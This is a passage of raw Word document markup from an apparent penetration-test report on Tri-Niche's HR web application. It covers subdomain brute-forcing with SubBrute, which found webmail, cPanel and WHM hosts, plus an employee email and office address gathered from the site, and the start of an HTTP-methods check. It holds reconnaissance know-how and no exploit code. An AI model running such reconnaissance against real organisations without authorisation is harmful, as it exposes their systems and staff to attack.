                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1097280" cy="1945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8BB90F">
              <v:rect id="Rectangle 18946398" style="position:absolute;margin-left:22.25pt;margin-top:184.6pt;width:86.4pt;height:1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2E5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Egg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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45FBE6E0" wp14:editId="6057DCDC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>214684</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>932953</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1709531" cy="1113183"/>
                <wp:effectExtent l="0" t="0" r="24130" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="18946394" name="Rectangle 18946394"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1709531" cy="1113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1B9726">
              <v:rect id="Rectangle 18946394" style="position:absolute;margin-left:16.9pt;margin-top:73.45pt;width:134.6pt;height:87.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016A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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658247" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A26BBFB" wp14:editId="14FA43F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3114675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>877253</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1423988" cy="219075"/>
                <wp:effectExtent l="0" t="0" r="24130" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="18946392" name="Rectangle 18946392"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1423988"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5F7B87">
              <v:rect id="Rectangle 18946392" style="position:absolute;margin-left:245.25pt;margin-top:69.1pt;width:112.15pt;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24CA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00573295" w:rsidRPr="00FF6265">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7AF757" wp14:editId="452AB11B">
            <wp:extent cx="5560486" cy="2682815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5610462" cy="2706927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E0B1F" w14:textId="77777777" w:rsidR="00537EFF" w:rsidRPr="00BA0CEF" w:rsidRDefault="00537EFF" w:rsidP="00573295">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE7CED3" w14:textId="7EBD5A80" w:rsidR="0090623A" w:rsidRDefault="002928E0" w:rsidP="0090623A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidR="00BC5835">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>rute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A980F" w14:textId="12E19A4B" w:rsidR="006D22FB" w:rsidRPr="00A31687" w:rsidRDefault="006D22FB" w:rsidP="00A31687">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E99D8" w14:textId="5EE1F965" w:rsidR="00FE1CB5" w:rsidRPr="00FE1CB5" w:rsidRDefault="00BE799A" w:rsidP="003132EA">
      <w:r>
        <w:t>Discovering subdomains is essential in reconnaissance.</w:t>
      </w:r>
      <w:r w:rsidR="006D758B">
        <w:t xml:space="preserve"> This tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D758B">
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidR="009B0E54">
        <w:t>ute-force</w:t>
      </w:r>
      <w:r w:rsidR="006D758B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009B0E54">
        <w:t xml:space="preserve"> subdomains</w:t>
      </w:r>
      <w:r w:rsidR="00EF61BA">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="005F56CE">
        <w:t>hrcms-admin.tri-niche.com uses</w:t>
      </w:r>
      <w:r w:rsidR="00515647">
        <w:t xml:space="preserve">. It is critical to discover subdomains </w:t>
      </w:r>
      <w:r w:rsidR="003B55F9">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="002A6D61">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve">can reveal a lot of </w:t>
      </w:r>
      <w:r w:rsidR="008B76F2">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="72EA33D0">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C1139">
        <w:t xml:space="preserve">within </w:t>
      </w:r>
      <w:r w:rsidR="004B1050">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve">scope of </w:t>
      </w:r>
      <w:r w:rsidR="00C71227">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C1820">
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidR="000F04BB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002A6D61" w:rsidRPr="002A6D61">
        <w:t xml:space="preserve"> which in turn increases the chances of finding vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="000F04BB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32">
        <w:t xml:space="preserve"> Also, it might f</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32" w:rsidRPr="00BB7B32">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32">
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32" w:rsidRPr="00BB7B32">
        <w:t xml:space="preserve"> applications running on hidden</w:t>
      </w:r>
      <w:r w:rsidR="00D33F29">
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32" w:rsidRPr="00BB7B32">
        <w:t xml:space="preserve"> forgotten subdomains</w:t>
      </w:r>
      <w:r w:rsidR="000E0804">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B32" w:rsidRPr="00BB7B32">
        <w:t xml:space="preserve"> may lead to uncovering critical vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00C104A3">
        <w:t xml:space="preserve">. As seen below, </w:t>
      </w:r>
      <w:r w:rsidR="00BC5835">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00C104A3">
        <w:t>ub</w:t>
      </w:r>
      <w:r w:rsidR="00BC5835">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00C104A3">
        <w:t>rute enumerat</w:t>
      </w:r>
      <w:r w:rsidR="0008645B">
        <w:t>ed some notable subdomains such as webmail, cpanel, and whm</w:t>
      </w:r>
      <w:r w:rsidR="00AF349C">
        <w:t xml:space="preserve"> from the hrc</w:t>
      </w:r>
      <w:r w:rsidR="001A616E">
        <w:t>ms-admin.tri-niche.com</w:t>
      </w:r>
      <w:r w:rsidR="003B4562">
        <w:t xml:space="preserve"> domain</w:t>
      </w:r>
      <w:r w:rsidR="0008645B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCAA8DC" w14:textId="24D34D7C" w:rsidR="00A46C7B" w:rsidRDefault="00586653" w:rsidP="00D1529D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00586653">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C374245" wp14:editId="038AE5DC">
            <wp:extent cx="4851807" cy="2457907"/>
            <wp:effectExtent l="0" t="0" r="635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4909939" cy="2487356"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA2FE60" w14:textId="77777777" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295"/>
    <w:p w14:paraId="10396343" w14:textId="77777777" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00E70F58">
      <w:r>
        <w:t xml:space="preserve">However, more information about the subdomain of the root domain, tri-niche.com, can be discovered as well by enumerating that domain name. As seen below, some interesting subdomains revealed are mail.tri-niche.com, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F925F5">
        <w:t>webmail.tri-niche.com</w:t>
      </w:r>
      <w:r>
        <w:t>, and cpanel.tri-niche.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC2EE36" w14:textId="5C00FC82" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001670C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CE3FBAB" wp14:editId="3240C082">
            <wp:extent cx="3625795" cy="2403730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946391" name="Picture 18946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1" name="Picture 18946391" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3659399" cy="2426008"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D4F3D" w14:textId="77777777" w:rsidR="00EC48F3" w:rsidRDefault="00EC48F3" w:rsidP="00586653"/>
    <w:p w14:paraId="46BB9C0E" w14:textId="7D8EE0B2" w:rsidR="00DE03B6" w:rsidRPr="00D70EBC" w:rsidRDefault="00573295" w:rsidP="00D70EBC">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB541D6" w14:textId="5AB880E2" w:rsidR="007140FA" w:rsidRDefault="00881E45" w:rsidP="007140FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc93487280"/>
      <w:bookmarkStart w:id="18" w:name="_Toc93502855"/>
      <w:bookmarkStart w:id="19" w:name="_Toc93526888"/>
      <w:bookmarkStart w:id="20" w:name="_Toc94100217"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidR="00A03202">
        <w:t>Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6C1C61AB" w14:textId="49B1E709" w:rsidR="00C6547D" w:rsidRDefault="00C6547D" w:rsidP="00C6547D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F4403" w14:textId="6A848EB7" w:rsidR="00E941C4" w:rsidRPr="00C6547D" w:rsidRDefault="004C7B2A" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidR="004301D4">
        <w:t>for what</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="004301D4">
        <w:t>be extracted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="004301D4">
        <w:t>Tr</w:t>
      </w:r>
      <w:r w:rsidR="00D86966">
        <w:t xml:space="preserve">i-Niche’s </w:t>
      </w:r>
      <w:r w:rsidR="002F34CD">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="00D86966">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AF07B2">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00FD1516">
        <w:t xml:space="preserve">usiness locations were shown to </w:t>
      </w:r>
      <w:r w:rsidR="001E5667">
        <w:t>be i</w:t>
      </w:r>
      <w:r w:rsidR="00FD1516">
        <w:t xml:space="preserve">n Singapore </w:t>
      </w:r>
      <w:r w:rsidR="001E5667">
        <w:t xml:space="preserve">at Woodlands Bizhub,190 </w:t>
      </w:r>
      <w:r w:rsidR="00817143">
        <w:t xml:space="preserve">Woodlands Industrial Park, E5 </w:t>
      </w:r>
      <w:r w:rsidR="00460857">
        <w:t>#08-14</w:t>
      </w:r>
      <w:r w:rsidR="00D93668">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00460857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54E15">
        <w:t>Singapore</w:t>
      </w:r>
      <w:r w:rsidR="00460857">
        <w:t xml:space="preserve"> 757516.</w:t>
      </w:r>
      <w:r w:rsidR="003B3B69">
        <w:t xml:space="preserve"> However</w:t>
      </w:r>
      <w:r w:rsidR="00BA3777">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FD1516">
        <w:t xml:space="preserve"> Indonesia</w:t>
      </w:r>
      <w:r w:rsidR="003B3B69">
        <w:t>’s office locat</w:t>
      </w:r>
      <w:r w:rsidR="00BA3777">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="003B3B69">
        <w:t xml:space="preserve"> was not stated. Apart from that, </w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t xml:space="preserve">phone numbers possibly personal </w:t>
      </w:r>
      <w:r w:rsidR="003C0AE6">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t xml:space="preserve"> business numbers</w:t>
      </w:r>
      <w:r w:rsidR="00241ABB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00952090">
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t xml:space="preserve">osh </w:t>
      </w:r>
      <w:r w:rsidR="00952090">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t>hing’s</w:t>
      </w:r>
      <w:r w:rsidR="00952090">
        <w:t xml:space="preserve"> company email </w:t>
      </w:r>
      <w:r w:rsidR="0007702C">
        <w:t>‘josh.ching@tri-niche.com’</w:t>
      </w:r>
      <w:r w:rsidR="00952090">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E5E67">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00952090">
        <w:t xml:space="preserve"> included as can be seen below.</w:t>
      </w:r>
      <w:r w:rsidR="0003467F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE564B3" w14:textId="3D7BA399" w:rsidR="00DF42CA" w:rsidRDefault="00625AAD" w:rsidP="00DF42CA">
      <w:r w:rsidRPr="00625AAD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64AE269E" wp14:editId="730E9108">
            <wp:extent cx="5943600" cy="2510155"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2510155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAA600" w14:textId="4B3FF940" w:rsidR="00A47C75" w:rsidRDefault="006D0838" w:rsidP="00DF42CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658246" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F99A445" wp14:editId="19F5733C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2093604</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>98620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1592571" cy="657619"/>
                <wp:effectExtent l="0" t="0" r="27305" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Rectangle 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1592571" cy="6576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3C1E90">
              <v:rect id="Rectangle 35" style="position:absolute;margin-left:164.85pt;margin-top:7.75pt;width:125.4pt;height:5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E55E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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00017406" w:rsidRPr="00017406">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C81C95D" wp14:editId="0761A927">
            <wp:extent cx="5943600" cy="1065530"/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1065530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E57D2" w14:textId="77777777" w:rsidR="0004601A" w:rsidRDefault="0004601A" w:rsidP="00DF42CA"/>
    <w:p w14:paraId="304DFE71" w14:textId="77777777" w:rsidR="00CA0975" w:rsidRDefault="00CA0975">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc93487281"/>
      <w:bookmarkStart w:id="22" w:name="_Toc93502856"/>
      <w:bookmarkStart w:id="23" w:name="_Toc93526889"/>
      <w:bookmarkStart w:id="24" w:name="_Toc94100218"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE46CE" w14:textId="4510CB24" w:rsidR="00F53D90" w:rsidRDefault="00F53D90" w:rsidP="00F53D90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Active Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0BA809A8" w14:textId="09B79D1B" w:rsidR="0029756B" w:rsidRPr="0029756B" w:rsidRDefault="0029756B" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">During this phase, </w:t>
      </w:r>
      <w:r w:rsidR="00435329">
        <w:t xml:space="preserve">various scanning tools </w:t>
      </w:r>
      <w:r w:rsidR="10B178D0">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00176ED1">
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidR="00435329">
        <w:t>gather information about vulnerabilities on the web application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A73071">
        <w:t xml:space="preserve">The information gathered by the tools </w:t>
      </w:r>
      <w:r w:rsidR="006C6162">
        <w:t>requires</w:t>
      </w:r>
      <w:r w:rsidR="003A4CFF">
        <w:t xml:space="preserve"> testing the web application</w:t>
      </w:r>
      <w:r w:rsidR="00F66C78">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>This section discusse</w:t>
      </w:r>
      <w:r w:rsidR="007742E1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> about the tools used to perform </w:t>
      </w:r>
      <w:r w:rsidR="007A0185">
        <w:t xml:space="preserve">active </w:t>
      </w:r>
      <w:r>
        <w:t>reconnaissance and the findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8DDC4C" w14:textId="3B271123" w:rsidR="00BF5B27" w:rsidRDefault="00BF5B27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc93487282"/>
      <w:bookmarkStart w:id="26" w:name="_Toc93502857"/>
    </w:p>
    <w:p w14:paraId="1C2AFA7B" w14:textId="32345AD8" w:rsidR="00AB355B" w:rsidRDefault="008A23ED" w:rsidP="00AB355B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc93526890"/>
      <w:bookmarkStart w:id="28" w:name="_Toc94100219"/>
      <w:r>
        <w:t>Profiling Web</w:t>
      </w:r>
      <w:r w:rsidR="004B44BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00557849">
        <w:t xml:space="preserve">Architecture </w:t>
      </w:r>
      <w:r w:rsidR="001C09FB">
        <w:t xml:space="preserve">Infrastructure </w:t>
      </w:r>
      <w:r w:rsidR="00557849">
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r w:rsidR="004B44BE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00557849">
        <w:t>echnology Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="422AEAFD" w14:textId="7B47259D" w:rsidR="00F126B0" w:rsidRDefault="000F155D" w:rsidP="000F155D">
      <w:r>
        <w:t>This section would</w:t>
      </w:r>
      <w:r w:rsidR="007E45AE">
        <w:t xml:space="preserve"> discuss about the tools and information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gathered </w:t>
      </w:r>
      <w:r w:rsidR="003F7A8E">
        <w:t>through automated tools to interrogate the web server</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC5">
        <w:t xml:space="preserve"> and other </w:t>
      </w:r>
      <w:r w:rsidR="00046EDE">
        <w:t>procedures</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC5">
        <w:t xml:space="preserve"> to profile the web application</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C409307" w14:textId="77777777" w:rsidR="00F126B0" w:rsidRPr="00F126B0" w:rsidRDefault="00F126B0" w:rsidP="00F126B0"/>
    <w:p w14:paraId="012CC062" w14:textId="62633ACE" w:rsidR="00394B0A" w:rsidRDefault="00AB355B" w:rsidP="00394B0A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DFDB5" w14:textId="0C97DB00" w:rsidR="00D50448" w:rsidRPr="00D50448" w:rsidRDefault="00D50448" w:rsidP="00D50448">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="00490237">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE17F1" w14:textId="2215E6E5" w:rsidR="008F6D17" w:rsidRPr="000A764D" w:rsidRDefault="008F6D17" w:rsidP="003132EA">
      <w:r>
        <w:t>Client URL (CURL) is a command line too</w:t>
      </w:r>
      <w:r w:rsidR="00E12F3A">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is </w:t>
      </w:r>
      <w:r w:rsidR="00FB287C">
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t>d to transfer data to and from a server.</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t xml:space="preserve"> Based on the results seen below, the CURL </w:t>
      </w:r>
      <w:r w:rsidR="006318FD">
        <w:t>command used to get the allowed HTTP methods were not displayed. Hence, usage of methods such as PUT to upload files and DELETE to remove files are not allowed on the web application.</w:t>
      </w:r>
      <w:r w:rsidR="00257F22">
        <w:t xml:space="preserve"> Moreover, as seen in the set-cookie field, HttpOnly was set which </w:t>
      </w:r>
      <w:r w:rsidR="00995B9C">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="4274F007">
        <w:t>prevent</w:t>
      </w:r>
